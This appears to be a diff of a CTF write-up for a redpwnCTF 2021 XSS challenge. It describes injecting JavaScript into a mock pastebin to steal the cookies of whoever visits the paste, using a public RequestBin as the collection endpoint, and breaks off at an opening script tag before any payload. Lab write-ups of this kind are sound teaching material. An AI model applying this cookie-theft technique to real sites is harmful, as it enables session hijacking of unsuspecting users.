JamesLowther/blog/Writeups/redpwnCTF 2021.md

 ## Solution
 For this challenge, we are given two links.
 One is a mock pastebin website where you can enter text, submit it, and be given a link to where it persists.
 The second link is a website that allows you to redirect a bot to a specific URL.

-Based on the nature of the websites and the description it's fairly clear that this is a classic XXS challenge.
+Based on the nature of the websites, and the description of the challenge, it's fairly clear that this is a classic XXS challenge.
 The mock pastebin website allows JavaScript that we write to be injected into the DOM of whoever visits the page.
-We can exploit this to steal a person's cookie.
+We can exploit this to steal a cookie of whoever visits the page with our JavaScript injection.

 First, I created a public [RequestBin](https://requestbin.com/) as an endpoint for our exploit.
 Then I created a new paste with the following content:

 ```html
 <script>